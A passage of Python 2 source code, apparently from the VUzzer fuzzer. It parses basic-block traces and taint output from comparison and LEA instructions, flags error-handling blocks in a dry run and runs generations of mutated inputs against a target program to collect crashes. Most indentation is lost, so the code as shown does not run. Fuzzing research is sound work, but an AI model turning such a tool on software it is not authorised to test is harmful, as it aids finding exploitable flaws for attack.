tLine = ln.split()
bbadr=int(tLine[0],0)
bbfr=int(tLine[1],0)
bb[bbadr] = bbfr
else:
try:
funcname, funcoffset = tuple(ln.strip().split(","))
except :
#retry
funcset = set()
config.OFFSET_FUNCNAME = dict()
bb = {}
flag = 0
continue
if funcname in funcset:
continue
funcset.add(funcname)
config.OFFSET_FUNCNAME[long(funcoffset[2:], 16)] = funcname
record_funcexec(funcset)
return bb
def form_bitvector(bbdict):
''' This function forms bit vector for each trace and append them to config.TEMPTRACE list. '''
newbb=0
temp=set()
for bbadr in bbdict:
temp.add(bbadr)
if bbadr not in config.BBSEENVECTOR:
#added for bit vector formation
newbb +=1
config.BBSEENVECTOR.append(bbadr)
tbv=BV.BitVector(size=(len(config.BBSEENVECTOR)))
if newbb == 0:
for el in temp:
tbv[config.BBSEENVECTOR.index(el)]=1
config.TEMPTRACE.append(tbv.deep_copy())
else:
for bvs in config.TEMPTRACE:
bvs.pad_from_right(newbb)
for el in temp:
tbv[config.BBSEENVECTOR.index(el)]=1
config.TEMPTRACE.append(tbv.deep_copy())
del tbv
def form_bitvector2(bbdict, name, source, dest):
    ''' This function forms a bit vector for a given bbdict trace for an input name, using the vector info from source, updates the source and finally appends it to the dest dict'''
newbb=0
temp=set()
for bbadr in bbdict:
temp.add(bbadr)
if bbadr not in source:
#added for bit vector formation
newbb +=1
source.append(bbadr)
tbv=BV.BitVector(size=(len(source)))
if newbb == 0:
for el in temp:
tbv[source.index(el)]=1
dest[name]=tbv.deep_copy()
else:
for bvs in dest.itervalues():
bvs.pad_from_right(newbb)
for el in temp:
tbv[source.index(el)]=1
dest[name]=tbv.deep_copy()
del tbv
def gen_bitvector(bbdict, source):
    ''' This function forms a bit vector for a given bbdict trace, using the vector info from source; if new BBs are seen it pads the existing vectors in config.SPECIAL_BITVECTOR, and it returns the new vector instead of storing it in a dict.'''
newbb=0
temp=set()
for bbadr in bbdict:
temp.add(bbadr)
if bbadr not in source:
#added for bit vector formation
newbb +=1
source.append(bbadr)
tbv=BV.BitVector(size=(len(source)))
if newbb == 0:
for el in temp:
tbv[source.index(el)]=1
else:
for bvs in config.SPECIAL_BITVECTOR:
bvs.pad_from_right(newbb)
for el in temp:
tbv[source.index(el)]=1
return tbv
def calculate_error_bb():
    ''' this function calculates probable error handling bbs. the heuristic is:
    if a bb appears in more than N% of the traces and it is not in the traces of valid inputs, it indicates an error handling bb.'''
erfd=open("errorbb.out",'w')
perc=(config.BBPERCENT/100)*config.POPSIZE
sn=len(config.BBSEENVECTOR)
tbv=BV.BitVector(size=sn)
tbv[-1]=1
for i in range(sn):
print "[*] cal error bb ",i,"/",sn
tbv=tbv>>1
        # count how many traces contain this BB; mark it as error-handling if it is common but never seen for valid inputs
        count = 0
        for tr in config.TEMPTRACE:
            tt = tr & tbv
            if tt.count_bits() == 1:
                count += 1
        if count > perc and config.BBSEENVECTOR[i] not in config.GOODBB:
config.TEMPERRORBB.add(config.BBSEENVECTOR[i])
for bbs in config.TEMPERRORBB:
erfd.write("0x%x\n"%(bbs,))
erfd.close()
del tt
del tbv
def execute(tfl):
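    # Run the SUT on input tfl under the BB-tracing command (config.BBCMD) and return (bb_dict, return_code, lava_code).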
bbs={}
args=config.SUT % tfl
runcmd=config.BBCMD+args.split(' ')
#print ' '.join(runcmd)
try:
os.unlink(config.BBOUT)
except:
pass
retc, lava_code = run(runcmd)
#check if loading address was changed
#liboffsetprev=int(config.LIBOFFSETS[1],0)
if config.LIBNUM == 2:
if config.BIT64 == False:
liboffsetcur=int(libfd_mm[:10],0)
else:
liboffsetcur=int(libfd_mm[:18],0)
libfd_mm.seek(0)
if liboffsetcur != int(config.LIBOFFSETS[1],0):
#print "Load address changed!"
gau.die("load address changed..run again!")
# open BB trace file to get BBs
bbs = bbdict(config.BBOUT)
if config.CLEANOUT == True:
gau.delete_out_file(tfl)
if len(bbs) == 0:
print ("[**] Error : # of executed BB is zero " )
exit(80)
print ("[**] # of executed BB : " + str(len(bbs)))
return (bbs,retc,lava_code)
def get_hexStr(inp):
    ''' This function receives a hex string (0xdddddd type) and returns a string of the form \xdd\xdd..... Also, we need to take care of endianness: if it is little endian, this string needs to be reversed'''
if len(inp[2:])%2 != 0:
r=bina.unhexlify('0'+inp[2:])
else:
r= bina.unhexlify(inp[2:])
if config.ARCHLIL==True:
return r[::-1]
else:
return r
#return bina.unhexlify('0'+inp[2:])
#return bina.unhexlify(inp[2:])
def isNonPrintable(hexstr):
nonprint=['\x0a','\x0d']
if hexstr in nonprint:
return True
else:
return False
def execute2(tfl,fl, is_initial=0):
'''tfl : absolute path of input, fl : given path, '''
if config.SUT[0] != '\\':
args= os.path.abspath(os.path.join(os.getcwd(), config.SUT)) % tfl
else:
args= config.SUT % tfl
args='\"' + args + '\"' # For cmd shell
pargs=config.PINTNTCMD[:]
if is_initial == 1:
runcmd = [pargs[0], args, fl, "0"]
else:
runcmd = [pargs[0], args, fl, str(config.TIMEOUT)]
#pargs[pargs.index("inputf")]=fl
#runcmd=pargs + args.split.split(' ')
print "[*] Executing: "," ".join(runcmd)
retc, lava_code = run(runcmd)
if config.CLEANOUT == True:
gau.delete_out_file(tfl)
return (retc, lava_code)
def extract_offsetStr(offStr,hexs,fsize):
'''offStr : {4,5,6} hexs : 0x5a76616c fsize : byte size of the entire file'''
    '''Given a string of comma-separated offsets and a hex value, this function returns a tuple of the first offset and the hex string.'''
offsets=offStr.split(',')
offsets=[int(o) for o in offsets]
if len(offsets)<5:#==1:#<5:
ofs=offsets[0]# as this only to detect magicbytes, i assume that magicbytes are contiguous in file and thus i only consider the 1st offset.
if ofs>fsize-config.MINOFFSET:
ofs=ofs-fsize
hexstr=get_hexStr(hexs)
#raw_input("hexStr: %s"%(hexstr,))
#raw_input("hexstr is %s"%(bina.b2a_hex(hexstr),))
return (ofs,hexstr)
else:
return (-1000, offsets[:])
def get_non_empty(mat, num):
ind=num
#mi = 1000000
while ind < num+9:
# I have changed this
try:
if mat.group(ind) !='':
#mi = min(mi, int(mat.group(ind)))
return mat.group(ind)
finally:
ind +=1
#if mi == 1000000:
return -1
#return str(mi)
def read_lea(fl):
'''
    we also read lea.out file to know offsets that were used in LEA instructions. These offsets are good candidates to fuzz with extreme values, like \xffffffff, \x80000000.'''
if ((not os.path.isfile("lea.out")) or os.path.getsize("lea.out") ==0):
print "[*] Warning! empty lea.out file!"
return set()
leaFD=open("lea.out","r")
offsets=set() # set to keep all the offsets that are used in LEA instructions.
pat=re.compile(r"(\d+) (\w+) \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\}",re.I)
cur_func = ""
func_leamap = dict()
for ln in leaFD:
mat=pat.match(ln)
try:# this is a check to see if lea entry is complete.
if config.BIT64 == False:
rr=mat.group(6)
else:
rr=mat.group(10)
except:
if "baseidx" not in ln:
cur_func = ln.strip()
if cur_func not in func_leamap:
func_leamap[cur_func] = set()
continue
tempoff=get_non_empty(mat,3)#mat.group(9)
if tempoff == -1:
continue
toff=[int(o) for o in tempoff.split(',')]
if len(toff)<5:
func_leamap[cur_func].update(toff)
offsets.add(toff[0])
config.FUNC_LEAMAP[fl] = func_leamap
leaFD.close()
return offsets.copy()
def record_funcexec(funcset):
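    # For a newly seen combination of executed functions, update the pairwise co-execution counters in config.FUNC_EXEC.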
funchash = 0
hashidx = 0
func_orig_set = set()
for func in funcset:
func_orig_set.add(func)
for func in config.FUNC_ID_MAP:
if func in funcset:
funchash = funchash | (1 << hashidx)
funcset.remove(func)
hashidx += 1
for func in funcset:
config.FUNC_ID_MAP.append(func)
funchash = funchash | (1 << hashidx)
hashidx += 1
if funchash not in config.FUNC_HASH_SET:
for fn1 in func_orig_set:
for fn2 in func_orig_set:
if fn1 in config.FUNC_EXEC:
if fn2 in config.FUNC_EXEC[fn1]:
config.FUNC_EXEC[fn1][fn2] += 1
else:
config.FUNC_EXEC[fn1][fn2] = 1
else:
config.FUNC_EXEC[fn1] = {fn2 : 1}
if fn2 in config.FUNC_EXEC:
if fn1 in config.FUNC_EXEC[fn2]:
config.FUNC_EXEC[fn2][fn1] += 1
else:
config.FUNC_EXEC[fn2][fn1] = 1
else:
config.FUNC_EXEC[fn2] = {fn1 : 1}
config.FUNC_HASH_SET.add(funchash)
def read_func(fl):
if ((not os.path.isfile("func.out")) or os.path.getsize("func.out") == 0):
print "[*] Warning! empty func.out file!"
return
funcFD = open("func.out", "r")
funcset = set()
for ln in funcFD:
funcname, funcoffset = tuple(ln.strip().split(","))
if funcname in funcset:
continue
funcset.add(funcname)
config.OFFSET_FUNCNAME[long(funcoffset)] = funcname
funcFD.close()
record_funcexec(funcset)
funcFD.close()
def check_timeout():
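    # Advance config.REL_STATUS through its phases based on elapsed time and stop fuzzing once TOTAL_TIMEOUT is reached.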
cur_time = time.time() - config.START_TIME
if (config.REL_STATUS == 0 and cur_time > config.REL_TIMEOUT1):
config.REL_STATUS = 1
elif (config.REL_STATUS == 1 and cur_time > config.REL_TIMEOUT2):
config.REL_STATUS = 2
elif (config.REL_STATUS == 2 and cur_time > config.REL_TIMEOUT3):
config.REL_STATUS = 3
if (cur_time) > config.TOTAL_TIMEOUT:
print "[**] Timeout reached"
if config.START_TIME != 0:
            print "[**] Total time %f sec."%(time.time() -config.START_TIME,)
print "[**] Fuzzing done. Check %s to see if there were crashes.."%(config.ERRORS,)
exit(0)
def read_taint(fpath, fl):
    ''' This function reads the cmp.out file and parses it to extract offsets and corresponding values and returns a tuple (alltaint, taintoff).
    taintoff: {offset -> a set of hex values} (hex values which are checked for that offset in the cmp instruction.)
    Currently, we want to extract values s.t. one of the operands of the CMP instruction is an imm value for this set of values.
    ADDITION: we also read the lea.out file to know offsets that were used in LEA instructions. These offsets are good candidates to fuzz with extreme values, like \xffffffff, \x80000000.
'''
taintOff=dict()#dictionary to keep info about single tainted offsets and values.
    alltaintoff=set()#it keeps all the offsets (excluding the above case) that were used at a CMP instruction.
func_taintmap = dict()
fsize=os.path.getsize(fpath)
offlimit=0
#check if taint was generated, else exit
if ((not os.path.isfile("cmp.out")) or os.path.getsize("cmp.out") ==0):
print "[*] Warning! empty cmp.out file!"
return (alltaintoff, taintOff)
#gau.die("Empty cmp.out file! Perhaps taint analysis did not run...")
cmpFD=open("cmp.out","r")
# each line of the cmp.out has the following format:
#32 reg imm 0xb640fb9d {155} {155} {155} {155} {} {} {} {} 0xc0 0xff
#g1 g2 g3 g4 g5 g6 g7 g8 g9 g10 g11 g12 g13 g14
# we need a regexp to parse this string.
cur_func = ""
if config.BIT64 == False:
pat=re.compile(r"(\d+) ([a-z]+) ([a-z]+) (\w+) \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} (\w+) (\w+)",re.I)
else:
pat=re.compile(r"(\d+) ([a-z]+) ([a-z]+) (\w+) \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} (\w+) (\w+)",re.I)
for ln in cmpFD:
if offlimit>config.MAXFILELINE:
break
offlimit +=1
mat=pat.match(ln)
try:# this is a check to see if CMP entry is complete.
if config.BIT64 == False:
rr=mat.group(14)
else:
rr=mat.group(22)
except:
cur_func = ln.strip()
if cur_func not in func_taintmap:
func_taintmap[cur_func] = set()
continue
if config.BIT64 == False:
op1start = 5
op2start = 9
op1val = 13
op2val = 14
else:
op1start = 5
op2start = 13
op1val = 21
op2val = 22
if config.ALLCMPOP == True: #False by default
'''
if mat.group(op1start) =='' and mat.group(op2start) !='':
tempoff=get_non_empty(mat,op2start)#mat.group(9)
if tempoff ==-1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op1val),fsize)
elif mat.group(op2start) =='' and mat.group(op1start) !='':
tempoff=get_non_empty(mat,op1start)#mat.group(5)
if tumpoff ==-1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op2val),fsize)
else:
ofs,hexstr=(-1000,[])
if ofs !=-1000:
if config.ALLBYTES==True or (hexstr !='\xff\xff\xff\xff' and hexstr != '\x00'):#this is a special case
if ofs not in taintOff:
taintOff[ofs]=[hexstr]# we are going to change set to list for "last" offset checked.
else:
#if hexstr not in taintOff[ofs]:
if config.ALLBYTES == True or isNonPrintable(hexstr) ==False:
taintOff[ofs].append(hexstr)
else:
alltaintoff.update(set(hexstr))
'''
else:
if mat.group(2) == 'imm': # possible?
tempoff=get_non_empty(mat,op2start)#mat.group(13)
if tempoff == -1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op1val),fsize)
if ofs !=-1000:
func_taintmap[cur_func].add(ofs)
if config.ALLBYTES == True or (hexstr !='\xff\xff\xff\xff' and hexstr != '\x00'):#this is a special case
if ofs not in taintOff:
taintOff[ofs]=[hexstr]# we are going to change set to list for "last" offset checked.
else:
#if hexstr not in taintOff[ofs]:
if config.ALLBYTES == True or isNonPrintable(hexstr) ==False:
taintOff[ofs].append(hexstr)
else:
#alltaintoff.update(set(offsets))
alltaintoff.update(set(hexstr))
elif mat.group(3) == 'imm':
tempoff=get_non_empty(mat,op1start)#mat.group(5)
if tempoff == -1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op2val),fsize)
if ofs !=-1000:
func_taintmap[cur_func].add(ofs)
if config.ALLBYTES == True or (hexstr !='\xff\xff\xff\xff' and hexstr !='\x00'):#this is a special case
if ofs not in taintOff:
taintOff[ofs]=[hexstr]# we are going to change set to list for "last" offset checked.
else:
#if hexstr not in taintOff[ofs]:
if config.ALLBYTES == True or isNonPrintable(hexstr) ==False:
taintOff[ofs].append(hexstr)
else:
alltaintoff.update(set(hexstr))
elif ((mat.group(2) == 'mem' and mat.group(3) =='mem') or (mat.group(2) == 'reg' and mat.group(3) =='reg')):
#bylen=mat.group(1)/8
#if bylen == 1:
#TOFIX: I am assuming that CMPS has second operand as constant and 1st operand is the byte from the input that we want to compare with 2nd operand. We need to handle the case when these operands are swapped.
if mat.group(op1start) =='' and mat.group(op2start) !='':
tempoff=get_non_empty(mat,op2start)#mat.group(9)
if tempoff ==-1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op1val),fsize)
elif mat.group(op2start) =='' and mat.group(op1start) !='':
tempoff=get_non_empty(mat,op1start)#mat.group(5)
if tempoff ==-1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op2val),fsize)
else:
ofs,hexstr=(-1000,[])
if ofs !=-1000:
func_taintmap[cur_func].add(ofs)
if config.ALLBYTES == True or (hexstr !='\xff\xff\xff\xff' and hexstr != '\x00'):#this is a special case
if ofs not in taintOff:
taintOff[ofs]=[hexstr]# we are going to change set to list for "last" offset checked.
else:
#if hexstr not in taintOff[ofs]:
if config.ALLBYTES == True or isNonPrintable(hexstr) ==False:
taintOff[ofs].append(hexstr)
else:
alltaintoff.update(set(hexstr))
else:
tmpset=set()
tmp1=mat.group(op1start)
if len(tmp1)>0:
tmpset.update(tmp1.split(','))
tmp2=mat.group(op2start)
if len(tmp2)>0:
tmpset.update(tmp2.split(','))
alltaintoff.update([int(o) for o in tmpset])
#alltaintoff.update(tmp1.split(','),tmp2.split(','))
#alltaintoff=set([int(o) for o in alltaintoff])
cmpFD.close()
todel=set()
for el in alltaintoff:
if el>fsize-config.MINOFFSET:
todel.add(el)
for el in todel:
alltaintoff.remove(el)
alltaintoff.add(el-fsize)
config.FUNC_TAINTMAP[fl] = func_taintmap
return (alltaintoff,taintOff)
def get_taint(dirin, is_initial=0):
''' This function is used to get taintflow for each CMP instruction to find which offsets in the input are used at the instructions. It also gets the values used in the CMP.'''
#print "[*] starting taintflow calculation."
files=os.listdir(dirin)
    #taintmap=dict()#this is a dictionary to keep the taintmap of each input file. Key is the input file name and value is a tuple returned by read_taint, wherein the 1st element is a set of all offsets used in cmp and the 2nd element is a dictionary mapping an offset to the set of values found at that offset in CMP instructions.
#mostcommon=dict()# this dictionary keeps offsets which are common across all the inputs with same value set.
for fl in files:
check_timeout()
if fl in config.TAINTMAP:
continue
pfl=os.path.abspath(os.path.join(dirin,fl))
if is_initial == 1:
tnow1=datetime.now()
rcode=execute2(pfl,fl, is_initial)
if is_initial == 1:
tnow2=datetime.now()
config.TIMEOUT = max(config.TIMEOUT, 2*((tnow2-tnow1).total_seconds()))
        if rcode[0] == 255: # execute2 returns (return_code, lava_code)
#continue #what..?!
gau.die("pintool terminated with error 255 on input %s"%(pfl,))
config.TAINTMAP[fl]=read_taint(pfl, fl)
config.LEAMAP[fl]=read_lea(fl)
#read_func(fl)
if config.MOSTCOMFLAG==False: #False by default
#print "computing MOSTCOM calculation..."
for k1,v1 in config.TAINTMAP.iteritems():
for off1,vset1 in v1[1].iteritems():
common_tag=True
if off1 > config.MAXOFFSET:
config.TAINTMAP[k1][0].add(off1)
#print "[==] ",k1,off1
continue
for k2,v2 in config.TAINTMAP.iteritems():
if off1 not in v2[1]:
config.TAINTMAP[k1][0].add(off1)
#print k2,v2[1]
common_tag=False
break
#print "passed..", off1
if len(set(vset1) & set(v2[1][off1]))==0:#set(vset1) != set(v2[off1])
#print k1, k2, off1, set(vset1), set(v2[1][off1])
config.TAINTMAP[k1][0].add(off1)
common_tag=False
break
#print "passed set", vset1
if common_tag==True:
config.MOSTCOMMON[off1]=list(set(vset1[:]))
#print "[++]",config.MOSTCOMMON[off1]
break # we just want to take one input and check if all the offsets in other inputs have commonality.
else:
#print "computing MORECOM calculation..."
for k1,v1 in config.TAINTMAP.iteritems():
for off1,vset1 in v1[1].iteritems():
common_tag=True
#if off1 > config.MAXOFFSET:
#print k1,off1
# continue
for k2,v2 in config.TAINTMAP.iteritems():
if off1 not in v2[1]:
config.TAINTMAP[k1][0].add(off1)
#print k2,v2[1]
common_tag=False
break
if len(set(vset1) ^ set(v2[1][off1]))>3:#vset1 != v2[1][off1]:
#print k2, vset1, v2[1][off1]
config.TAINTMAP[k1][0].add(off1)
common_tag=False
break
if common_tag==True:
config.MORECOMMON[off1]=list(set(vset1[:]))
#print config.MOSTCOMMON[off1]
break # we just want to take one input and check if all the offsets in other inputs have commonality.
#print config.MOSTCOMMON, '=====', config.MORECOMMON
#gw = raw_input("press enter")
print "[*] taintflow finished."
def dry_run():
''' this function executes the initial test set to determine error handling BBs in the SUT. Such BBs are given zero weights during actual fuzzing.
'''
print "[*] Starting dry run now..."
tempbad=[]
dfiles=os.listdir(config.INITIALD)
if len(dfiles) <3:
gau.die("not sufficient initial files")
for fl in dfiles:
tfl=os.path.join(config.INITIALD,fl)
try:
f=open(tfl, 'r')
f.close()
except:
gau.die("can not open our own input %s!"%(tfl,))
(bbs,retc,lava_code)=execute(tfl)
if retc not in config.NON_CRASH_RET_CODES:
print "Signal: %d"% (retc,)
print tfl
gau.die("looks like we already got a crash!!")
config.GOODBB |= set(bbs.keys())
iln = os.path.getsize(tfl)
gau.fitnesCal2(bbs, fl, iln, retc)
print "[*] Finished good inputs (%d)"%(len(config.GOODBB),)
#now lets run SUT of probably invalid files. For that we need to create them first.
print "[*] Starting bad inputs.."
lp=0
badbb=set()
while lp <2:
try:
shutil.rmtree(config.INPUTD)
except OSError:
pass
os.mkdir(config.INPUTD)
gau.create_files_dry(30)
dfiles=os.listdir(config.INPUTD)
for fl in dfiles:
tfl=os.path.join(config.INPUTD,fl)
(bbs,retc,lava_code)=execute(tfl)
if retc not in config.NON_CRASH_RET_CODES :
print "Signal: %d"% (retc,)
print tfl
gau.die("looks like we already got a crash!!")
tempbad.append(set(bbs.keys()) - config.GOODBB)
tempcomn=set(tempbad[0])
for di in tempbad:
tempcomn.intersection_update(set(di))
badbb.update(tempcomn)
lp +=1
#else:
# tempcomn = set()
###print "[*] finished bad inputs (%d)"%(len(tempbad),)
config.ERRORBBALL=badbb.copy()
print "[*] finished common BB. Total bad BB: %d"%(len(badbb),)
for ebb in config.ERRORBBALL:
print "error bb: 0x%x"%(ebb,)
time.sleep(5)
if config.LIBNUM == 2:
baseadr=config.LIBOFFSETS[1]
for ele in tempcomn:
if ele < baseadr:
config.ERRORBBAPP.add(ele)
else:
config.ERRORBBLIB.add(ele-baseadr)
del tempbad
del badbb
#del tempgood
return len(config.GOODBB),len(config.ERRORBBALL)
def get_rel_funcs():
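    # Merge the pickled related-function maps listed in config.REL_FUNC_FILES into config.REL_FUNC.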
for ff in config.REL_FUNC_FILES:
fi = open(ff, "r")
rel_funcs = pickle.load(fi)
for func in rel_funcs:
if func in config.REL_FUNC:
config.REL_FUNC[func].update(rel_funcs[func])
else:
config.REL_FUNC[func] = rel_funcs[func]
fi.close()
def print_func_exec():
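    # Dump the function co-execution matrix (config.FUNC_EXEC) as funcrel.csv under config.LOGS.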
ff = open(os.path.join(config.LOGS, "funcrel.csv"), "w")
fl = config.FUNC_EXEC.keys()
ff.write(",")
for f1 in fl:
ff.write(f1+",")
ff.write("\n")
for f1 in fl:
ff.write(f1 +",")
for f2 in fl:
if f2 not in config.FUNC_EXEC[f1]:
ff.write("0,")
else:
ff.write(str(config.FUNC_EXEC[f1][f2]) + "," )
ff.write("\n")
ff.close()
def run_error_bb(pt):
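    # Re-run every input in the population, build their BB bitvectors and recompute likely error-handling BBs.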
print "[*] Starting run_error_bb."
files = os.listdir(config.INPUTD)
for fl in files:
tfl=os.path.join(config.INPUTD,fl)
(bbs,retc,lava_code)=execute(tfl)
#if retc < 0:
# print "[*] crashed while executing %s"%(fl,)
# gau.die("Bye...")
print "[*] form bitvector of ",fl
form_bitvector(bbs)
    print "[*] start calculating error bb"
calculate_error_bb()
def copy_files(src, dest,num):
files = random.sample(os.listdir(src),num)
for fl in files:
tfl=os.path.join(src,fl)
shutil.copy(tfl,dest)
def conditional_copy_files(src, dest,num):
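    # Copy up to num files from src to dest, restricted to files that have not been taint-analysed yet.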
#count = 0;
#tempbuf=set()
flist=os.listdir(src)
# we need to handle the case wherein newly added files in SPECIAL are less than the num. in this case, we only copy these newly added files to dest.
extra=set(flist)-set(config.TAINTMAP)
if len(extra) == 0:
return -1
if len(extra)<num:
for fl in extra:
tfl=os.path.join(src,fl)
shutil.copy(tfl,dest)
return 0
else:
tlist=random.sample(list(extra),num)
for fl in tlist:
tfl=os.path.join(src,fl)
shutil.copy(tfl,dest)
return 0
#while count <num:
# fl =random.choice(os.listdir(src))
# if fl not in config.TAINTMAP and fl not in tempbuf:
# tempbuf.add(fl)
# count +=1
# tfl=os.path.join(src,fl)
# shutil.copy(tfl,dest)
#del tempbuf
def main():
    # first lets create the base directory to keep all temporary data
try:
shutil.rmtree(config.BASETMP)
except OSError:
pass
if os.path.isdir(config.BASETMP)== False:
os.mkdir(config.BASETMP)
check_env()
## parse the arguments #########
parser = argparse.ArgumentParser(description='VUzzer options')
parser.add_argument('-s','--sut', help='SUT commandline',required=True)
parser.add_argument('-i','--inputd', help='seed input directory (relative path)',required=True)
    parser.add_argument('-w','--weight', help='path of the pickle file(s) for BB weights (separated by comma, in case there are two)',required=True)
parser.add_argument('-n','--name', help='Path of the pickle file(s) containing strings from CMP inst (separated by comma if there are two).',required=True)
    parser.add_argument('-l','--libnum', help='Number of binaries to monitor (only application or used libraries)',required=False, default=1)
parser.add_argument('-o','--offsets',help='base-address of application and library (if used), separated by comma', required=False, default='0x00000000')
parser.add_argument('-b','--libname',help='library name to monitor',required=False, default='#')
parser.add_argument('-f','--func', help='rel func file got from ghiddra', required=False, default='')
args = parser.parse_args()
config.SUT=args.sut
config.INITIALD=os.path.join(config.INITIALD, args.inputd)
config.LIBNUM=int(args.libnum)
config.LIBTOMONITOR=args.libname
config.LIBPICKLE=[w for w in args.weight.split(',')]
config.NAMESPICKLE=[n for n in args.name.split(',')]
config.LIBOFFSETS=[o for o in args.offsets.split(',')]
config.REL_FUNC_FILES=[f for f in args.func.split(',')]
config.LIBS=args.libname
ih=config.BBCMD.index("LIBS=") # this is just to find the index of the placeholder in BBCMD list to replace it with the libname
config.BBCMD[ih]="LIBS=%s" % args.libname
###################################
config.minLength=get_min_file(config.INITIALD)
try:
shutil.rmtree(config.KEEPD)
except OSError:
pass
os.mkdir(config.KEEPD)
try:
shutil.rmtree(config.KEEPALLD)
except OSError:
pass
os.mkdir(config.KEEPALLD)
try:
os.mkdir("outd")
except OSError:
pass
try:
os.mkdir("outd/crashInputs")
except OSError:
gau.emptyDir("outd/crashInputs")
crashHash=[]
try:
os.mkdir(config.SPECIAL)
except OSError:
gau.emptyDir(config.SPECIAL)
try:
os.mkdir(config.INTER)
except OSError:
gau.emptyDir(config.INTER)
try:
os.mkdir(config.LOGS)
except OSError:
gau.emptyDir(config.LOGS)
#############################################################################
#let us get the base address of the main executable.
'''
ifiles=os.listdir(config.INITIALD)
for fl in ifiles:
tfl=os.path.join(config.INITIALD,fl)
try:
f=open(tfl, 'r')
f.close()
except:
gau.die("can not open our own input %s!"%(tfl,))
(ibbs,iretc)=execute(tfl)
break # we just want to run the executable once to get its load address
imgOffFd=open("imageOffset.txt",'r')
for ln in imgOffFd:
if "Main:" in ln:
lst=ln.split()
break
config.LIBOFFSETS[0]=lst[1][:]
imgOffFd.close()
#############################################################################
'''
#it does not automatically read right offset......
config.LIBOFFSETS[0]= "0x400000"
###### open names pickle files
gau.prepareBBOffsets()
# lets initialize the BBFORPRUNE list from thie cALLBB set.
if len(config.cALLBB)>0:
config.BBFORPRUNE=list(config.cALLBB)
else:
        print "[*]: cALLBB is not initialized. something is wrong!!\n"
raise SystemExit(1)
if config.PTMODE: #false
pt = simplept.simplept()
else:
pt = None
if config.ERRORBBON==True:
gbb,bbb=dry_run()
else:
gbb=0
get_rel_funcs()
# gau.die("dry run over..")
import timing
#selftest()
noprogress=0
currentfit=0
lastfit=0
config.CRASHIN.clear()
stat=open(os.path.join(config.LOGS,"stats.log"),'w')
stat.write("**** Fuzzing started at: %s ****\n"%(datetime.now().isoformat('+'),))
stat.write("**** Initial BB for seed inputs: %d ****\n"%(gbb,))
stat.flush()
os.fsync(stat.fileno())
    stat.write("Generation\t MINfit\t MAXfit\t AVGfit\t MINlen\t MAXlen\t AVGlen\t #BB\t AppCov\t AllCov\t Time\t Crash\n")
stat.flush()
os.fsync(stat.fileno())
config.START_TIME=time.time()
allnodes = set()
alledges = set()
try:
shutil.rmtree(config.INPUTD)
except OSError:
pass
shutil.copytree(config.INITIALD,config.INPUTD)
    # first we get taint of the initial inputs
get_taint(config.INITIALD) #,1)
check_timeout()
'''
print "TAINTMAP : \n"
for f in config.TAINTMAP:
print "{",f,"}->(alltaint(size:",len(config.TAINTMAP[f][0]),"): ",config.TAINTMAP[f][0],","
print "bytes_value: (# of bytes : ",len(config.TAINTMAP[f][1]),
for b in config.TAINTMAP[f][1]:
print b,"-> ",len(config.TAINTMAP[f][1][b])," values, ",
print ""
'''
config.MOSTCOMFLAG=True
crashhappend=False
filest = os.listdir(config.INPUTD)
filenum=len(filest)
if filenum < config.POPSIZE:
gau.create_files(config.POPSIZE - filenum)
if len(os.listdir(config.INPUTD)) != config.POPSIZE:
gau.die("something went wrong. number of files is not right!")
efd=open(config.ERRORS,"w")
#gau.prepareBBOffsets() #??
writecache = True
genran=0
bbslide=40 # this is used to call run_error_BB() functions
keepslide=3
keepfilenum=config.BESTP
config.SEENBB.clear()#initialize set of BB seen so far, which is 0
todelete=set()#temp set to keep file names that will be deleted in the special folder
check_timeout()
while True:
#print "[**] Generation %d\n***********"%(genran,)
del config.TEMPTRACE[:]
del config.BBSEENVECTOR[:]
check_timeout()
SPECIALCHANGED= False # this is set when a config.SPECIAL gets at least one new input per generation.
config.TMPBBINFO.clear()
config.TMPBBINFO.update(config.PREVBBINFO)
fitnes=dict()
execs=0
config.cPERGENBB.clear()
config.GOTSTUCK=False
if False: #config.ERRORBBON == True:
if genran > config.GENNUM/5:
bbslide = max(bbslide,config.GENNUM/20)
keepslide=max(keepslide,config.GENNUM/100)
keepfilenum=keepfilenum/2
if 0 < genran < config.GENNUM/5 and genran%keepslide == 0:
copy_files(config.INPUTD,config.KEEPD,keepfilenum)
#lets find out some of the error handling BBs
if genran > 40 and genran % bbslide==0:
stat.write("\n**** Error BB cal started ****\n")
stat.flush()
os.fsync(stat.fileno())
run_error_bb(pt)
copy_files(config.KEEPD,config.INPUTD,len(os.listdir(config.KEEPD))*1/10)
#copy_files(config.INITIALD,config.INPUTD,1)
files=os.listdir(config.INPUTD)
per_gen_fnum=0
execute_time = time.time()
#count BB and calculate fitness function for each TC.
for fl in files:
check_timeout()
per_gen_fnum +=1
tfl=os.path.join(config.INPUTD,fl)
iln=os.path.getsize(tfl)
args = (config.SUT % tfl).split(' ')
progname = os.path.basename(args[0])
(bbs,retc,lava_code)=execute(tfl) #count bb
if per_gen_fnum % 10 ==0:
print "[**] Gen: %d. Executed %d of %d.**, took %f sec"%(genran,per_gen_fnum,config.POPSIZE, time.time() -execute_time)
execute_time = time.time()
if config.BBWEIGHT == True: #True by default
fitnes[fl]=gau.fitnesCal2(bbs,fl,iln, retc)
else:
fitnes[fl]=gau.fitnesNoWeight(bbs,fl,iln)
execs+=1
#let us prune the inputs(if at all), whose trace is subset of the new input just got executed.
SPECIALADDED= False
if config.GOTSPECIAL == True : #config.GOTSPECIAL==True : #and (retc in config.NON_CRASH_RET_CODES) :
SPECIALCHANGED=True
SPECIALADDED= True
todelete.clear()
tbv = gen_bitvector(bbs, config.BBFORPRUNE)
